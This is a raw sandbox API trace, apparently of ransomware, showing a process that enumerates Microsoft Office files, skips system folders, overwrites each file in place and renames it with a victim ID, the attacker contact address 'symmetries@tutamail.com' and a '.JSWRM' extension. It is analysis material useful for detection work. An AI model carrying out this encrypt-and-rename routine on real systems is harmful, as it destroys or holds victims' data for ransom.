1 [0122.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2254c0 | out: hHeap=0x1e0000) returned 1 [0122.224] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0122.224] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x482f84d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x482f84d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x482f84d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x277, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISIO_COL.HXC", cAlternateFileName="VISIO_~1.HXC")) returned 1 [0122.226] lstrcmpiW (lpString1="VISIO_COL.HXC", lpString2=".") returned 1 [0122.226] lstrcmpiW (lpString1="VISIO_COL.HXC", lpString2="..") returned 1 [0122.226] lstrcmpiW (lpString1="VISIO_COL.HXC", lpString2="...") returned 1 [0122.226] lstrcmpiW (lpString1="VISIO_COL.HXC", lpString2="windows") returned -1 [0122.226] lstrcmpiW (lpString1="VISIO_COL.HXC", lpString2="recovery") returned 1 [0122.226] lstrcmpiW (lpString1="VISIO_COL.HXC", lpString2="perflogs") returned 1 [0122.226] lstrcmpiW (lpString1="VISIO_COL.HXC", lpString2="documents and settings") returned 1 [0122.226] lstrcmpiW (lpString1="VISIO_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0122.227] lstrcmpiW (lpString1="VISIO_COL.HXC", lpString2="system volume information") returned 1 [0122.227] lstrcmpiW (lpString1="VISIO_COL.HXC", lpString2="msocache") returned 1 [0122.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0122.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_COL.HXC", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_COL.HXC", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_COL.HXC", lpUsedDefaultChar=0x0) returned 13 [0122.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0122.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_COL.HXC", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_COL.HXC", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_COL.HXC", lpUsedDefaultChar=0x0) returned 13 [0122.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0122.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0122.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.227] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0122.227] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.228] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=631) returned 1 [0122.228] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x270) returned 0x20b1f8 [0122.228] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x270, lpOverlapped=0x0) returned 1 [0122.381] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.381] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x270, lpOverlapped=0x0) returned 1 [0122.381] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0122.382] CloseHandle (hObject=0x238) returned 1 [0122.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0122.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0122.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0122.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0122.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0122.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0122.382] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.382] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0122.382] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0122.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0122.384] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x482f84d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x482f84d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x482f84d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xcd, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISIO_COL.HXT", cAlternateFileName="VISIO_~1.HXT")) returned 1 [0122.384] lstrcmpiW (lpString1="VISIO_COL.HXT", lpString2=".") returned 1 [0122.384] lstrcmpiW (lpString1="VISIO_COL.HXT", lpString2="..") returned 1 [0122.384] lstrcmpiW (lpString1="VISIO_COL.HXT", lpString2="...") returned 1 [0122.384] lstrcmpiW (lpString1="VISIO_COL.HXT", lpString2="windows") returned -1 [0122.384] lstrcmpiW (lpString1="VISIO_COL.HXT", lpString2="recovery") returned 1 [0122.384] lstrcmpiW (lpString1="VISIO_COL.HXT", lpString2="perflogs") returned 1 [0122.384] lstrcmpiW (lpString1="VISIO_COL.HXT", lpString2="documents and settings") returned 1 [0122.384] lstrcmpiW (lpString1="VISIO_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0122.384] lstrcmpiW (lpString1="VISIO_COL.HXT", lpString2="system volume information") returned 1 [0122.384] lstrcmpiW (lpString1="VISIO_COL.HXT", lpString2="msocache") returned 1 [0122.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0122.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_COL.HXT", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_COL.HXT", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_COL.HXT", lpUsedDefaultChar=0x0) returned 13 [0122.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0122.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0122.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_COL.HXT", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0122.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_COL.HXT", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_COL.HXT", lpUsedDefaultChar=0x0) returned 13 [0122.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0122.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0122.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0122.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.385] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0122.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.386] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=205) returned 1 [0122.386] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.386] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c000 [0122.386] ReadFile (in: hFile=0x238, lpBuffer=0x24c000, nNumberOfBytesToRead=0xc0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c000*, lpNumberOfBytesRead=0x345e89c*=0xc0, lpOverlapped=0x0) returned 1 [0122.387] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.387] WriteFile (in: hFile=0x238, lpBuffer=0x24c000*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c000*, lpNumberOfBytesWritten=0x345e898*=0xc0, lpOverlapped=0x0) returned 1 [0122.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0122.387] CloseHandle (hObject=0x238) returned 1 [0122.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0122.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0122.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0122.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0122.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0122.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0122.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0122.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0122.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.387] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_col.hxt"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_COL.HXT.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_col.hxt.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0122.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0122.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0122.388] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x482f84d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x482f84d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x482f84d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x72, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISIO_F_COL.HXK", cAlternateFileName="VISIO_~1.HXK")) returned 1 [0122.388] lstrcmpiW (lpString1="VISIO_F_COL.HXK", lpString2=".") returned 1 [0122.388] lstrcmpiW (lpString1="VISIO_F_COL.HXK", lpString2="..") returned 1 [0122.388] lstrcmpiW (lpString1="VISIO_F_COL.HXK", lpString2="...") returned 1 [0122.388] lstrcmpiW (lpString1="VISIO_F_COL.HXK", lpString2="windows") returned -1 [0122.388] lstrcmpiW (lpString1="VISIO_F_COL.HXK", lpString2="recovery") returned 1 [0122.388] lstrcmpiW (lpString1="VISIO_F_COL.HXK", lpString2="perflogs") returned 1 [0122.389] lstrcmpiW (lpString1="VISIO_F_COL.HXK", lpString2="documents and settings") returned 1 [0122.389] lstrcmpiW (lpString1="VISIO_F_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0122.389] lstrcmpiW (lpString1="VISIO_F_COL.HXK", lpString2="system volume information") returned 1 [0122.389] lstrcmpiW (lpString1="VISIO_F_COL.HXK", lpString2="msocache") returned 1 [0122.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0122.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_F_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0122.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0122.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0122.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0122.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VISIO_F_COL.HXK", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VISIO_F_COL.HXK", lpUsedDefaultChar=0x0) returned 15 [0122.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0122.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0122.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0122.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0122.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0122.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0122.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0122.390] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=114) returned 1 [0122.390] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209878 [0122.390] ReadFile (in: hFile=0x238, lpBuffer=0x209878, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x209878*, lpNumberOfBytesRead=0x345e89c*=0x70, lpOverlapped=0x0) returned 1 [0122.391] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.391] WriteFile (in: hFile=0x238, lpBuffer=0x209878*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x209878*, lpNumberOfBytesWritten=0x345e898*=0x70, lpOverlapped=0x0) returned 1 [0122.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0122.391] CloseHandle (hObject=0x238) returned 1 [0122.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0122.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0122.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0122.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0122.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0122.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0122.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0122.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0122.391] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0122.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0122.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0122.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0122.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0122.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0122.392] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_f_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\VISIO_F_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\visio_f_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0122.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0122.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0122.392] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0122.392] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x482f84d, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x482f84d, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x482f84d, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x71, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="VISIO_K_COL.HXK", cAlternateFileName="VISIO_~2.HXK")) returned 1 [0122.393] lstrcmpiW (lpString1="VISIO_K_COL.HXK", lpString2=".") returned 1 [0122.393] lstrcmpiW (lpString1="VISIO_K_COL.HXK", lpString2="..") returned 1 [0122.393] lstrcmpiW (lpString1="VISIO_K_COL.HXK", lpString2="...") returned 1 [0122.393] lstrcmpiW (lpString1="VISIO_K_COL.HXK", lpString2="windows") returned -1 [0122.393] lstrcmpiW (lpString1="VISIO_K_COL.HXK", lpString2="recovery") returned 1 [0122.393] lstrcmpiW (lpString1="VISIO_K_COL.HXK", lpString2="perflogs") returned 1 [0122.393] lstrcmpiW (lpString1="VISIO_K_COL.HXK", lpString2="documents and settings") returned 1 [0122.393] lstrcmpiW (lpString1="VISIO_K_COL.HXK", lpString2="$RECYCLE.BIN") returned 1 [0122.393] lstrcmpiW (lpString1="VISIO_K_COL.HXK", lpString2="system volume information") returned 1 